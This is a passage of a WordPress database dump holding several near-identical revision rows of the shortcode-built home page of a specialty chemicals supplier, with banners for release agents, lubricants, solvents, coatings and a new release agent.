Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:11:56', '2016-08-15 23:11:56', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (155, 1, '2016-08-15 23:12:26', '2016-08-15 23:12:26', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n&nbsp;\r\n<br>\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:12:26', '2016-08-15 23:12:26', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (156, 1, '2016-08-15 23:13:18', '2016-08-15 23:13:18', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#040066" bg="#040066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n&nbsp;\r\n<br>\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:13:18', '2016-08-15 23:13:18', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (157, 1, '2016-08-15 23:15:16', '2016-08-15 23:15:16', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#100047" bg="#100047"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n\r\n&nbsp;\r\n<br>\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:15:16', '2016-08-15 23:15:16', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (158, 1, '2016-08-15 23:16:26', '2016-08-15 23:16:26', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#004363" bg="#004363"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n\r\n&nbsp;\r\n<br>\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:16:26', '2016-08-15 23:16:26', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (159, 1, '2016-08-15 23:18:10', '2016-08-15 23:18:10', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n\r\n&nbsp;\r\n<br>\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:18:10', '2016-08-15 23:18:10', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (160, 1, '2016-08-15 23:18:58', '2016-08-15 23:18:58', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="139" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n&nbsp;\r\n<br>\r\n[col span="5/6"]\r\n\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 23:18:58', '2016-08-15 23:18:58', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
